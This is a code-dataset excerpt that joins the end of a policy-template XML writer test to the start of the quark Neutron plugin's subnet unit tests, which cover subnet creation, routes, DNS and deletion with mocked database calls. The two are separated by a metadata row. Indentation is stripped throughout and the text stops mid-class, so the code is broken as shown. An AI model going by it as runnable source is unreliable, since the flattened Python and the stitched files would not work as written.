self.writer._active_policies_elem = self.writer._doc.documentElement
self.writer._active_mandatory_policy_group_name = 'PolicyGroup'
self.writer.WritePolicy(enum_policy)
output = self.writer.GetTemplateText()
expected_output = (
'<?xml version="1.0" ?>\n'
'<policyDefinitions>\n'
' <policy class="' + self.writer.GetClass(enum_policy) + '"'
' displayName="$(string.SampleEnumPolicy)"'
' explainText="$(string.SampleEnumPolicy_Explain)"'
' key="Software\\Policies\\' + self._GetKey() + '"'
' name="SampleEnumPolicy"'
' presentation="$(presentation.SampleEnumPolicy)">\n'
' <parentCategory ref="PolicyGroup"/>\n'
' <supportedOn ref="SUPPORTED_TESTOS"/>\n'
' <elements>\n'
' <enum id="SampleEnumPolicy" valueName="SampleEnumPolicy">\n'
' <item displayName="$(string.SampleEnumPolicy_item_1)">\n'
' <value>\n'
' <string>one</string>\n'
' </value>\n'
' </item>\n'
' <item displayName="$(string.SampleEnumPolicy_item_2)">\n'
' <value>\n'
' <string>two</string>\n'
' </value>\n'
' </item>\n'
' </enum>\n'
' </elements>\n'
' </policy>\n'
'</policyDefinitions>')
self.AssertXMLEquals(output, expected_output)
def testListPolicy(self):
list_policy = {
'name': 'SampleListPolicy',
'type': 'list',
}
self._initWriterForPolicy(self.writer, list_policy)
self.writer.WritePolicy(list_policy)
output = self.GetXMLOfChildren(self._GetPoliciesElement(self.writer._doc))
expected_output = (
'<policy class="' + self.writer.GetClass(list_policy) + '"'
' displayName="$(string.SampleListPolicy)"'
' explainText="$(string.SampleListPolicy_Explain)"'
' key="Software\\Policies\\' + self._GetKey() + '"'
' name="SampleListPolicy"'
' presentation="$(presentation.SampleListPolicy)">\n'
' <parentCategory ref="PolicyGroup"/>\n'
' <supportedOn ref="SUPPORTED_TESTOS"/>\n'
' <elements>\n'
' <list id="SampleListPolicyDesc"'
' key="Software\Policies\\' + self._GetKey() + '\SampleListPolicy"'
' valuePrefix=""/>\n'
' </elements>\n'
'</policy>')
self.AssertXMLEquals(output, expected_output)
def testStringEnumListPolicy(self):
list_policy = {
'name':
'SampleListPolicy',
'type':
'string-enum-list',
'items': [
{
'name': 'item_1',
'value': 'one'
},
{
'name': 'item_2',
'value': 'two'
},
]
}
self._initWriterForPolicy(self.writer, list_policy)
self.writer.WritePolicy(list_policy)
output = self.GetXMLOfChildren(self._GetPoliciesElement(self.writer._doc))
expected_output = (
'<policy class="' + self.writer.GetClass(list_policy) + '"'
' displayName="$(string.SampleListPolicy)"'
' explainText="$(string.SampleListPolicy_Explain)"'
' key="Software\\Policies\\' + self._GetKey() + '"'
' name="SampleListPolicy"'
' presentation="$(presentation.SampleListPolicy)">\n'
' <parentCategory ref="PolicyGroup"/>\n'
' <supportedOn ref="SUPPORTED_TESTOS"/>\n'
' <elements>\n'
' <list id="SampleListPolicyDesc"'
' key="Software\Policies\\' + self._GetKey() + '\SampleListPolicy"'
' valuePrefix=""/>\n'
' </elements>\n'
'</policy>')
self.AssertXMLEquals(output, expected_output)
def testDictionaryPolicy(self, is_external=False):
dict_policy = {
'name': 'SampleDictionaryPolicy',
'type': 'external' if is_external else 'dict',
}
self._initWriterForPolicy(self.writer, dict_policy)
self.writer.WritePolicy(dict_policy)
output = self.GetXMLOfChildren(self._GetPoliciesElement(self.writer._doc))
expected_output = (
'<policy class="' + self.writer.GetClass(dict_policy) + '"'
' displayName="$(string.SampleDictionaryPolicy)"'
' explainText="$(string.SampleDictionaryPolicy_Explain)"'
' key="Software\\Policies\\' + self._GetKey() + '"'
' name="SampleDictionaryPolicy"'
' presentation="$(presentation.SampleDictionaryPolicy)">\n'
' <parentCategory ref="PolicyGroup"/>\n'
' <supportedOn ref="SUPPORTED_TESTOS"/>\n'
' <elements>\n'
' <text id="SampleDictionaryPolicy" maxLength="1000000"'
' valueName="SampleDictionaryPolicy"/>\n'
' </elements>\n'
'</policy>')
self.AssertXMLEquals(output, expected_output)
def testExternalPolicy(self):
self.testDictionaryPolicy(is_external=True)
def testPlatform(self):
# Test that the writer correctly chooses policies of platform Windows.
self.assertTrue(
self.writer.IsPolicySupported({
'supported_on': [{
'platform': 'win'
}, {
'platform': 'aaa'
}]
}))
self.assertFalse(
self.writer.IsPolicySupported({
'supported_on': [{
'platform': 'mac'
}, {
'platform': 'aaa'
}, {
'platform': 'linux'
}]
}))
def testStringEncodings(self):
enum_policy_a = {
'name': 'SampleEnumPolicy.A',
'type': 'string-enum',
'items': [{
'name': 'tls1.2',
'value': 'tls1.2'
}]
}
enum_policy_b = {
'name': 'SampleEnumPolicy.B',
'type': 'string-enum',
'items': [{
'name': 'tls1.2',
'value': 'tls1.2'
}]
}
dom_impl = minidom.getDOMImplementation('')
self.writer._doc = dom_impl.createDocument(None, 'policyDefinitions', None)
self.writer._active_policies_elem = self.writer._doc.documentElement
self.writer._active_mandatory_policy_group_name = 'PolicyGroup'
self.writer.WritePolicy(enum_policy_a)
self.writer.WritePolicy(enum_policy_b)
output = self.writer.GetTemplateText()
expected_output = (
'<?xml version="1.0" ?>\n'
'<policyDefinitions>\n'
' <policy class="' + self.writer.GetClass(enum_policy_a) + '"'
' displayName="$(string.SampleEnumPolicy_A)"'
' explainText="$(string.SampleEnumPolicy_A_Explain)"'
' key="Software\\Policies\\' + self._GetKey() + '"'
' name="SampleEnumPolicy.A"'
' presentation="$(presentation.SampleEnumPolicy.A)">\n'
' <parentCategory ref="PolicyGroup"/>\n'
' <supportedOn ref="SUPPORTED_TESTOS"/>\n'
' <elements>\n'
' <enum id="SampleEnumPolicy.A" valueName="SampleEnumPolicy.A">\n'
' <item displayName="$(string.SampleEnumPolicy_A_tls1_2)">\n'
' <value>\n'
' <string>tls1.2</string>\n'
' </value>\n'
' </item>\n'
' </enum>\n'
' </elements>\n'
' </policy>\n'
' <policy class="' + self.writer.GetClass(enum_policy_b) + '"'
' displayName="$(string.SampleEnumPolicy_B)"'
' explainText="$(string.SampleEnumPolicy_B_Explain)"'
' key="Software\\Policies\\' + self._GetKey() + '"'
' name="SampleEnumPolicy.B"'
' presentation="$(presentation.SampleEnumPolicy.B)">\n'
' <parentCategory ref="PolicyGroup"/>\n'
' <supportedOn ref="SUPPORTED_TESTOS"/>\n'
' <elements>\n'
' <enum id="SampleEnumPolicy.B" valueName="SampleEnumPolicy.B">\n'
' <item displayName="$(string.SampleEnumPolicy_B_tls1_2)">\n'
' <value>\n'
' <string>tls1.2</string>\n'
' </value>\n'
' </item>\n'
' </enum>\n'
' </elements>\n'
' </policy>\n'
'</policyDefinitions>')
self.AssertXMLEquals(output, expected_output)
if __name__ == '__main__':
unittest.main()
| bsd-3-clause | 4,272,008,609,559,117,300 | 35.664286 | 80 | 0.561816 | false |
jkoelker/quark | quark/tests/plugin_modules/test_subnets.py | 1 | 36379 | # Copyright 2013 Openstack Foundation
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import contextlib
import copy
import time
import uuid
import mock
from neutron.api.v2 import attributes as neutron_attrs
from neutron.common import exceptions
from neutron.openstack.common.notifier import api as notifier_api
from oslo.config import cfg
from quark.db import models
from quark.tests import test_quark_plugin
class TestQuarkGetSubnetCount(test_quark_plugin.TestQuarkPlugin):
def test_get_subnet_count(self):
"""This isn't really testable."""
with mock.patch("quark.db.api.subnet_count_all"):
self.plugin.get_subnets_count(self.context, {})
class TestQuarkGetSubnets(test_quark_plugin.TestQuarkPlugin):
@contextlib.contextmanager
def _stubs(self, subnets=None, routes=None):
if routes is None:
routes = []
route_models = []
for route in routes:
r = models.Route()
r.update(route)
route_models.append(r)
if isinstance(subnets, list):
subnet_models = []
for subnet in subnets:
s_dict = subnet.copy()
s_dict["routes"] = route_models
s = models.Subnet(network=models.Network())
s.update(s_dict)
subnet_models.append(s)
elif subnets:
mod = models.Subnet(network=models.Network())
mod.update(subnets)
mod["routes"] = route_models
subnet_models = mod
else:
subnet_models = None
with mock.patch("quark.db.api.subnet_find") as subnet_find:
subnet_find.return_value = subnet_models
yield
def test_subnets_list(self):
subnet_id = str(uuid.uuid4())
route = dict(id=1, cidr="0.0.0.0/0", gateway="192.168.0.1")
subnet = dict(id=subnet_id, network_id=1, name=subnet_id,
tenant_id=self.context.tenant_id, ip_version=4,
cidr="192.168.0.0/24", gateway_ip="192.168.0.1",
dns_nameservers=[],
enable_dhcp=None)
expected_route = dict(destination=route["cidr"],
nexthop=route["gateway"])
with self._stubs(subnets=[subnet], routes=[route]):
res = self.plugin.get_subnets(self.context, {}, {})
# Compare routes separately
routes = res[0].pop("host_routes")
for key in subnet.keys():
self.assertEqual(res[0][key], subnet[key])
for key in expected_route.keys():
self.assertEqual(routes[0][key], expected_route[key])
def test_subnet_show_fail(self):
with self._stubs():
with self.assertRaises(exceptions.SubnetNotFound):
self.plugin.get_subnet(self.context, 1)
def test_subnet_show(self):
subnet_id = str(uuid.uuid4())
route = dict(id=1, cidr="0.0.0.0/0", gateway="192.168.0.1",
subnet_id=subnet_id)
expected_route = dict(destination=route["cidr"],
nexthop=route["gateway"])
subnet = dict(id=subnet_id, network_id=1, name=subnet_id,
tenant_id=self.context.tenant_id, ip_version=4,
cidr="192.168.0.0/24", gateway_ip="192.168.0.1",
dns_nameservers=[],
enable_dhcp=None)
with self._stubs(subnets=subnet, routes=[route]):
res = self.plugin.get_subnet(self.context, subnet_id)
# Compare routes separately
routes = res.pop("host_routes")
for key in subnet.keys():
self.assertEqual(res[key], subnet[key])
for key in expected_route.keys():
self.assertEqual(routes[0][key], expected_route[key])
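# Note added for clarity (not part of the original module): the test classes below
# share a common pattern -- each defines a _stubs() contextmanager that
# mock.patch()es the relevant quark.db.api functions, wires model objects up as
# their return values, and yields the mocks so individual tests can assert both on
# the plugin's response and on how many times each DB call was made.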
class TestQuarkCreateSubnetOverlapping(test_quark_plugin.TestQuarkPlugin):
@contextlib.contextmanager
def _stubs(self, subnets=None):
if subnets is None:
subnets = []
subnet_models = []
for subnet in subnets:
s = models.Subnet()
s.update(subnet)
subnet_models.append(s)
network = models.Network()
network.update(dict(id=1, subnets=subnet_models))
with contextlib.nested(
mock.patch("quark.db.api.network_find"),
mock.patch("quark.db.api.subnet_find"),
mock.patch("quark.db.api.subnet_create")
) as (net_find, subnet_find, subnet_create):
net_find.return_value = network
subnet_find.return_value = subnet_models
subnet_create.return_value = models.Subnet(
network=models.Network(),
cidr="192.168.1.1/24")
yield subnet_create
def test_create_subnet_overlapping_true(self):
cfg.CONF.set_override('allow_overlapping_ips', True)
with self._stubs() as subnet_create:
s = dict(subnet=dict(
gateway_ip=neutron_attrs.ATTR_NOT_SPECIFIED,
dns_nameservers=neutron_attrs.ATTR_NOT_SPECIFIED,
cidr="192.168.1.1/8",
network_id=1))
self.plugin.create_subnet(self.context, s)
self.assertEqual(subnet_create.call_count, 1)
def test_create_subnet_overlapping_false(self):
cfg.CONF.set_override('allow_overlapping_ips', False)
with self._stubs() as subnet_create:
s = dict(subnet=dict(
gateway_ip=neutron_attrs.ATTR_NOT_SPECIFIED,
dns_nameservers=neutron_attrs.ATTR_NOT_SPECIFIED,
cidr="192.168.1.1/8",
network_id=1))
self.plugin.create_subnet(self.context, s)
self.assertEqual(subnet_create.call_count, 1)
def test_create_subnet_overlapping_conflict(self):
cfg.CONF.set_override('allow_overlapping_ips', False)
with self._stubs(subnets=[dict(cidr="192.168.10.1/24")]):
with self.assertRaises(exceptions.InvalidInput):
s = dict(subnet=dict(cidr="192.168.1.1/8",
network_id=1))
self.plugin.create_subnet(self.context, s)
class TestQuarkCreateSubnetAllocationPools(test_quark_plugin.TestQuarkPlugin):
@contextlib.contextmanager
def _stubs(self, subnet):
s = models.Subnet(network=models.Network(id=1, subnets=[]))
s.update(subnet)
with contextlib.nested(
mock.patch("quark.db.api.network_find"),
mock.patch("quark.db.api.subnet_find"),
mock.patch("quark.db.api.subnet_create"),
) as (net_find, subnet_find, subnet_create):
net_find.return_value = s["network"]
subnet_find.return_value = []
subnet_create.return_value = s
yield subnet_create
def setUp(self):
super(TestQuarkCreateSubnetAllocationPools, self).setUp()
def tearDown(self):
super(TestQuarkCreateSubnetAllocationPools, self).tearDown()
def test_create_subnet_allocation_pools_zero(self):
s = dict(subnet=dict(
cidr="192.168.1.1/24",
network_id=1))
with self._stubs(s["subnet"]) as (subnet_create):
resp = self.plugin.create_subnet(self.context, s)
self.assertEqual(subnet_create.call_count, 1)
self.assertEqual(resp["allocation_pools"],
[dict(start="192.168.1.2", end="192.168.1.254")])
def test_create_subnet_allocation_pools_one(self):
pools = [dict(start="192.168.1.10", end="192.168.1.20")]
s = dict(subnet=dict(
allocation_pools=pools,
cidr="192.168.1.1/24",
network_id=1))
with self._stubs(s["subnet"]) as (subnet_create):
resp = self.plugin.create_subnet(self.context, s)
self.assertEqual(subnet_create.call_count, 1)
self.assertEqual(resp["allocation_pools"], pools)
def test_create_subnet_allocation_pools_two(self):
pools = [dict(start="192.168.1.10", end="192.168.1.20"),
dict(start="192.168.1.40", end="192.168.1.50")]
s = dict(subnet=dict(
allocation_pools=pools,
cidr="192.168.1.1/24",
network_id=1))
with self._stubs(s["subnet"]) as (subnet_create):
resp = self.plugin.create_subnet(self.context, s)
self.assertEqual(subnet_create.call_count, 1)
self.assertEqual(resp["allocation_pools"], pools)
def test_create_subnet_allocation_pools_empty_list(self):
pools = []
s = dict(subnet=dict(
allocation_pools=pools,
cidr="192.168.1.1/24",
network_id=1))
with self._stubs(s["subnet"]) as (subnet_create):
resp = self.plugin.create_subnet(self.context, s)
self.assertEqual(subnet_create.call_count, 1)
self.assertEqual(resp["allocation_pools"], pools)
# TODO(amir): Refactor the tests to test individual subnet attributes.
# * copy.deepcopy was necessary to maintain tests on keys, which is a bit ugly.
# * workaround is also in place for lame ATTR_NOT_SPECIFIED object()
class TestQuarkCreateSubnet(test_quark_plugin.TestQuarkPlugin):
@contextlib.contextmanager
def _stubs(self, subnet=None, network=None, routes=None, dns=None):
if network:
net = models.Network()
net.update(network)
network = net
subnet_mod = models.Subnet(network=models.Network())
dns_ips = subnet.pop("dns_nameservers", [])
host_routes = subnet.pop("host_routes", [])
subnet_mod.update(subnet)
subnet["dns_nameservers"] = dns_ips
subnet["host_routes"] = host_routes
routes = routes or []
dns = dns or []
route_models = [models.Route(**r) for r in routes]
dns_models = [models.DNSNameserver(**d) for d in dns]
with contextlib.nested(
mock.patch("quark.db.api.subnet_create"),
mock.patch("quark.db.api.network_find"),
mock.patch("quark.db.api.dns_create"),
mock.patch("quark.db.api.route_create"),
) as (subnet_create, net_find, dns_create, route_create):
subnet_create.return_value = subnet_mod
net_find.return_value = network
route_create.side_effect = route_models
dns_create.side_effect = dns_models
yield subnet_create, dns_create, route_create
def test_create_subnet(self):
routes = [dict(cidr="0.0.0.0/0", gateway="0.0.0.0")]
subnet = dict(
subnet=dict(network_id=1,
tenant_id=self.context.tenant_id, ip_version=4,
cidr="172.16.0.0/24", gateway_ip="0.0.0.0",
dns_nameservers=neutron_attrs.ATTR_NOT_SPECIFIED,
host_routes=neutron_attrs.ATTR_NOT_SPECIFIED,
enable_dhcp=None))
network = dict(network_id=1)
with self._stubs(
subnet=subnet["subnet"],
network=network,
routes=routes
) as (subnet_create, dns_create, route_create):
dns_nameservers = subnet["subnet"].pop("dns_nameservers")
host_routes = subnet["subnet"].pop("host_routes")
subnet_request = copy.deepcopy(subnet)
subnet_request["subnet"]["dns_nameservers"] = dns_nameservers
subnet_request["subnet"]["host_routes"] = host_routes
res = self.plugin.create_subnet(self.context,
subnet_request)
self.assertEqual(subnet_create.call_count, 1)
self.assertEqual(dns_create.call_count, 0)
self.assertEqual(route_create.call_count, 1)
for key in subnet["subnet"].keys():
if key == "host_routes":
self.assertEqual(res[key][0]["destination"], "0.0.0.0/0")
self.assertEqual(res[key][0]["nexthop"], "0.0.0.0")
else:
self.assertEqual(res[key], subnet["subnet"][key])
def test_create_subnet_no_network_fails(self):
subnet = dict(subnet=dict(network_id=1))
with self._stubs(subnet=dict(), network=None):
with self.assertRaises(exceptions.NetworkNotFound):
self.plugin.create_subnet(self.context, subnet)
def test_create_subnet_no_gateway_ip_defaults(self):
routes = [dict(cidr="0.0.0.0/0", gateway="172.16.0.1")]
subnet = dict(
subnet=dict(network_id=1,
tenant_id=self.context.tenant_id, ip_version=4,
cidr="172.16.0.0/24",
gateway_ip=neutron_attrs.ATTR_NOT_SPECIFIED,
dns_nameservers=neutron_attrs.ATTR_NOT_SPECIFIED,
enable_dhcp=None))
network = dict(network_id=1)
with self._stubs(
subnet=subnet["subnet"],
network=network,
routes=routes
) as (subnet_create, dns_create, route_create):
dns_nameservers = subnet["subnet"].pop("dns_nameservers")
gateway_ip = subnet["subnet"].pop("gateway_ip")
subnet_request = copy.deepcopy(subnet)
subnet_request["subnet"]["dns_nameservers"] = dns_nameservers
subnet_request["subnet"]["gateway_ip"] = gateway_ip
res = self.plugin.create_subnet(self.context, subnet_request)
self.assertEqual(subnet_create.call_count, 1)
self.assertEqual(dns_create.call_count, 0)
self.assertEqual(route_create.call_count, 1)
for key in subnet["subnet"].keys():
if key == "gateway_ip":
self.assertEqual(res[key], "172.16.0.1")
elif key == "host_routes":
self.assertEqual(res[key][0]["destination"], "0.0.0.0/0")
self.assertEqual(res[key][0]["nexthop"], "172.16.0.1")
else:
self.assertEqual(res[key], subnet["subnet"][key])
def test_create_subnet_dns_nameservers(self):
routes = [dict(cidr="0.0.0.0/0", gateway="0.0.0.0")]
dns_ns = [dict(ip="4.2.2.1"), dict(ip="4.2.2.2")]
subnet = dict(
subnet=dict(network_id=1,
tenant_id=self.context.tenant_id, ip_version=4,
cidr="172.16.0.0/24", gateway_ip="0.0.0.0",
dns_nameservers=["4.2.2.1", "4.2.2.2"],
enable_dhcp=None))
network = dict(network_id=1)
with self._stubs(
subnet=subnet["subnet"],
network=network,
routes=routes,
dns=dns_ns
) as (subnet_create, dns_create, route_create):
res = self.plugin.create_subnet(self.context,
copy.deepcopy(subnet))
self.assertEqual(subnet_create.call_count, 1)
self.assertEqual(dns_create.call_count, 2)
self.assertEqual(route_create.call_count, 1)
for key in subnet["subnet"].keys():
if key == "host_routes":
self.assertEqual(res[key][0]["destination"], "0.0.0.0/0")
self.assertEqual(res[key][0]["nexthop"], "0.0.0.0")
else:
self.assertEqual(res[key], subnet["subnet"][key])
def test_create_subnet_routes(self):
routes = [dict(cidr="1.1.1.1/8", gateway="172.16.0.4"),
dict(cidr="0.0.0.0/0", gateway="0.0.0.0")]
subnet = dict(
subnet=dict(network_id=1,
tenant_id=self.context.tenant_id, ip_version=4,
cidr="172.16.0.0/24", gateway_ip="0.0.0.0",
dns_nameservers=neutron_attrs.ATTR_NOT_SPECIFIED,
host_routes=[{"destination": "1.1.1.1/8",
"nexthop": "172.16.0.4"}],
enable_dhcp=None))
network = dict(network_id=1)
with self._stubs(
subnet=subnet["subnet"],
network=network,
routes=routes
) as (subnet_create, dns_create, route_create):
dns_nameservers = subnet["subnet"].pop("dns_nameservers")
subnet_request = copy.deepcopy(subnet)
subnet_request["subnet"]["dns_nameservers"] = dns_nameservers
res = self.plugin.create_subnet(self.context, subnet_request)
self.assertEqual(subnet_create.call_count, 1)
self.assertEqual(dns_create.call_count, 0)
self.assertEqual(route_create.call_count, 2)
for key in subnet["subnet"].keys():
if key == "host_routes":
res_tuples = [(r["destination"], r["nexthop"])
for r in res[key]]
self.assertIn(("1.1.1.1/8", "172.16.0.4"), res_tuples)
self.assertIn(("0.0.0.0/0", "0.0.0.0"), res_tuples)
self.assertEqual(2, len(res_tuples))
else:
self.assertEqual(res[key], subnet["subnet"][key])
def test_create_subnet_default_route(self):
routes = [dict(cidr="0.0.0.0/0", gateway="172.16.0.4")]
subnet = dict(
subnet=dict(network_id=1,
tenant_id=self.context.tenant_id, ip_version=4,
cidr="172.16.0.0/24",
gateway_ip=neutron_attrs.ATTR_NOT_SPECIFIED,
dns_nameservers=neutron_attrs.ATTR_NOT_SPECIFIED,
host_routes=[{"destination": "0.0.0.0/0",
"nexthop": "172.16.0.4"}],
enable_dhcp=None))
network = dict(network_id=1)
with self._stubs(
subnet=subnet["subnet"],
network=network,
routes=routes
) as (subnet_create, dns_create, route_create):
dns_nameservers = subnet["subnet"].pop("dns_nameservers")
gateway_ip = subnet["subnet"].pop("gateway_ip")
subnet_request = copy.deepcopy(subnet)
subnet_request["subnet"]["dns_nameservers"] = dns_nameservers
subnet_request["subnet"]["gateway_ip"] = gateway_ip
res = self.plugin.create_subnet(self.context, subnet_request)
self.assertEqual(subnet_create.call_count, 1)
self.assertEqual(dns_create.call_count, 0)
self.assertEqual(route_create.call_count, 1)
for key in subnet["subnet"].keys():
if key == "host_routes":
res_tuples = [(r["destination"], r["nexthop"])
for r in res[key]]
self.assertEqual([("0.0.0.0/0", "172.16.0.4")], res_tuples)
elif key == "gateway_ip":
self.assertEqual(res[key], "172.16.0.4")
else:
self.assertEqual(res[key], subnet["subnet"][key])
def test_create_subnet_default_route_gateway_ip(self):
"""If default route (host_routes) and gateway_ip are both provided,
        then the host_routes entry takes precedence.
"""
routes = [dict(cidr="0.0.0.0/0", gateway="172.16.0.4")]
subnet = dict(
subnet=dict(network_id=1,
tenant_id=self.context.tenant_id, ip_version=4,
cidr="172.16.0.0/24",
gateway_ip="172.16.0.3",
dns_nameservers=neutron_attrs.ATTR_NOT_SPECIFIED,
host_routes=[{"destination": "0.0.0.0/0",
"nexthop": "172.16.0.4"}],
enable_dhcp=None))
network = dict(network_id=1)
with self._stubs(
subnet=subnet["subnet"],
network=network,
routes=routes
) as (subnet_create, dns_create, route_create):
dns_nameservers = subnet["subnet"].pop("dns_nameservers")
subnet_request = copy.deepcopy(subnet)
subnet_request["subnet"]["dns_nameservers"] = dns_nameservers
res = self.plugin.create_subnet(self.context, subnet_request)
self.assertEqual(subnet_create.call_count, 1)
self.assertEqual(dns_create.call_count, 0)
self.assertEqual(route_create.call_count, 1)
for key in subnet["subnet"].keys():
if key == "host_routes":
res_tuples = [(r["destination"], r["nexthop"])
for r in res[key]]
self.assertEqual([("0.0.0.0/0", "172.16.0.4")], res_tuples)
elif key == "gateway_ip":
self.assertEqual(res[key], "172.16.0.4")
else:
self.assertEqual(res[key], subnet["subnet"][key])
class TestQuarkUpdateSubnet(test_quark_plugin.TestQuarkPlugin):
DEFAULT_ROUTE = [dict(destination="0.0.0.0/0",
nexthop="172.16.0.1")]
@contextlib.contextmanager
def _stubs(self, host_routes=None, new_routes=None, find_routes=True,
new_dns_servers=None):
if host_routes is None:
host_routes = []
if new_routes:
new_routes = [models.Route(cidr=r["destination"],
gateway=r["nexthop"],
subnet_id=1)
for r in new_routes]
if new_dns_servers:
new_dns_servers = [models.DNSNameserver(
ip=ip,
subnet_id=1) for ip in new_dns_servers]
subnet = dict(
id=1,
network_id=1,
tenant_id=self.context.tenant_id, ip_version=4,
cidr="172.16.0.0/24",
host_routes=host_routes,
dns_nameservers=["4.2.2.1", "4.2.2.2"],
enable_dhcp=None)
dns_ips = subnet.pop("dns_nameservers", [])
host_routes = subnet.pop("host_routes", [])
subnet_mod = models.Subnet()
subnet_mod.update(subnet)
subnet_mod["dns_nameservers"] = [models.DNSNameserver(ip=ip)
for ip in dns_ips]
subnet_mod["routes"] = [models.Route(cidr=r["destination"],
gateway=r["nexthop"],
subnet_id=subnet_mod["id"])
for r in host_routes]
with contextlib.nested(
mock.patch("quark.db.api.subnet_find"),
mock.patch("quark.db.api.subnet_update"),
mock.patch("quark.db.api.dns_create"),
mock.patch("quark.db.api.route_find"),
mock.patch("quark.db.api.route_update"),
mock.patch("quark.db.api.route_create"),
) as (subnet_find, subnet_update,
dns_create,
route_find, route_update, route_create):
subnet_find.return_value = subnet_mod
route_find.return_value = subnet_mod["routes"][0] \
if subnet_mod["routes"] and find_routes else None
new_subnet_mod = models.Subnet(network=models.Network())
new_subnet_mod.update(subnet_mod)
if new_routes:
new_subnet_mod["routes"] = new_routes
if new_dns_servers:
new_subnet_mod["dns_nameservers"] = new_dns_servers
subnet_update.return_value = new_subnet_mod
yield dns_create, route_update, route_create
def test_update_subnet_not_found(self):
with self.assertRaises(exceptions.SubnetNotFound):
self.plugin.update_subnet(self.context, 1, {})
def test_update_subnet_dns_nameservers(self):
new_dns_servers = ["1.1.1.2"]
with self._stubs(
host_routes=self.DEFAULT_ROUTE,
new_dns_servers=new_dns_servers
) as (dns_create, route_update, route_create):
req = dict(subnet=dict(dns_nameservers=new_dns_servers))
res = self.plugin.update_subnet(self.context,
1,
req)
self.assertEqual(dns_create.call_count, 1)
self.assertEqual(route_create.call_count, 0)
self.assertEqual(res["dns_nameservers"], new_dns_servers)
def test_update_subnet_routes(self):
new_routes = [dict(destination="10.0.0.0/24",
nexthop="1.1.1.1")]
with self._stubs(
host_routes=self.DEFAULT_ROUTE,
new_routes=new_routes
) as (dns_create, route_update, route_create):
req = dict(subnet=dict(
host_routes=new_routes))
res = self.plugin.update_subnet(self.context, 1, req)
self.assertEqual(dns_create.call_count, 0)
self.assertEqual(route_create.call_count, 1)
self.assertEqual(len(res["host_routes"]), 1)
self.assertEqual(res["host_routes"][0]["destination"],
"10.0.0.0/24")
self.assertEqual(res["host_routes"][0]["nexthop"],
"1.1.1.1")
self.assertIsNone(res["gateway_ip"])
def test_update_subnet_gateway_ip_with_default_route_in_db(self):
with self._stubs(
host_routes=self.DEFAULT_ROUTE,
new_routes=[dict(destination="0.0.0.0/0", nexthop="1.2.3.4")]
) as (dns_create, route_update, route_create):
req = dict(subnet=dict(gateway_ip="1.2.3.4"))
res = self.plugin.update_subnet(self.context, 1, req)
self.assertEqual(dns_create.call_count, 0)
self.assertEqual(route_create.call_count, 0)
self.assertEqual(route_update.call_count, 1)
self.assertEqual(len(res["host_routes"]), 1)
self.assertEqual(res["host_routes"][0]["destination"],
"0.0.0.0/0")
self.assertEqual(res["host_routes"][0]["nexthop"],
"1.2.3.4")
self.assertEqual(res["gateway_ip"], "1.2.3.4")
def test_update_subnet_gateway_ip_with_non_default_route_in_db(self):
with self._stubs(
host_routes=[dict(destination="1.1.1.1/8", nexthop="9.9.9.9")],
find_routes=False,
new_routes=[dict(destination="1.1.1.1/8", nexthop="9.9.9.9"),
dict(destination="0.0.0.0/0", nexthop="1.2.3.4")]
) as (dns_create, route_update, route_create):
req = dict(subnet=dict(gateway_ip="1.2.3.4"))
res = self.plugin.update_subnet(self.context, 1, req)
self.assertEqual(dns_create.call_count, 0)
self.assertEqual(route_create.call_count, 1)
self.assertEqual(res["gateway_ip"], "1.2.3.4")
self.assertEqual(len(res["host_routes"]), 2)
res_tuples = [(r["destination"], r["nexthop"])
for r in res["host_routes"]]
self.assertIn(("0.0.0.0/0", "1.2.3.4"), res_tuples)
self.assertIn(("1.1.1.1/8", "9.9.9.9"), res_tuples)
def test_update_subnet_gateway_ip_without_default_route_in_db(self):
with self._stubs(
host_routes=None,
new_routes=[dict(destination="0.0.0.0/0", nexthop="1.2.3.4")]
) as (dns_create, route_update, route_create):
req = dict(subnet=dict(gateway_ip="1.2.3.4"))
res = self.plugin.update_subnet(self.context, 1, req)
self.assertEqual(dns_create.call_count, 0)
self.assertEqual(route_create.call_count, 1)
self.assertEqual(len(res["host_routes"]), 1)
self.assertEqual(res["host_routes"][0]["destination"],
"0.0.0.0/0")
self.assertEqual(res["host_routes"][0]["nexthop"],
"1.2.3.4")
self.assertEqual(res["gateway_ip"], "1.2.3.4")
def test_update_subnet_gateway_ip_with_default_route_in_args(self):
new_routes = [dict(destination="0.0.0.0/0",
nexthop="4.3.2.1")]
with self._stubs(
host_routes=self.DEFAULT_ROUTE,
new_routes=new_routes
) as (dns_create, route_update, route_create):
req = dict(subnet=dict(
host_routes=new_routes,
gateway_ip="1.2.3.4"))
res = self.plugin.update_subnet(self.context, 1, req)
self.assertEqual(dns_create.call_count, 0)
self.assertEqual(route_create.call_count, 1)
self.assertEqual(len(res["host_routes"]), 1)
self.assertEqual(res["host_routes"][0]["destination"],
"0.0.0.0/0")
self.assertEqual(res["host_routes"][0]["nexthop"],
"4.3.2.1")
self.assertEqual(res["gateway_ip"], "4.3.2.1")
class TestQuarkDeleteSubnet(test_quark_plugin.TestQuarkPlugin):
@contextlib.contextmanager
def _stubs(self, subnet, ips):
ip_mods = []
subnet_mod = None
if subnet:
subnet_mod = models.Subnet()
subnet_mod.update(subnet)
for ip in ips:
ip_mod = models.IPAddress()
ip_mod.update(ip)
ip_mods.append(ip_mod)
db_mod = "quark.db.api"
with contextlib.nested(
mock.patch("%s.subnet_find" % db_mod),
mock.patch("%s.subnet_delete" % db_mod)
) as (sub_find, sub_delete):
if subnet_mod:
subnet_mod.allocated_ips = ip_mods
sub_find.return_value = subnet_mod
yield sub_delete
def test_delete_subnet(self):
subnet = dict(id=1)
with self._stubs(subnet=subnet, ips=[]) as sub_delete:
self.plugin.delete_subnet(self.context, 1)
self.assertTrue(sub_delete.called)
def test_delete_subnet_no_subnet_fails(self):
with self._stubs(subnet=None, ips=[]):
with self.assertRaises(exceptions.SubnetNotFound):
self.plugin.delete_subnet(self.context, 1)
def test_delete_subnet_has_allocated_ips_fails(self):
subnet = dict(id=1)
with self._stubs(subnet=subnet, ips=[{}]):
with self.assertRaises(exceptions.SubnetInUse):
self.plugin.delete_subnet(self.context, 1)
class TestSubnetsNotification(test_quark_plugin.TestQuarkPlugin):
@contextlib.contextmanager
def _stubs(self, s, deleted_at=None):
class FakeContext(object):
def __enter__(*args, **kwargs):
pass
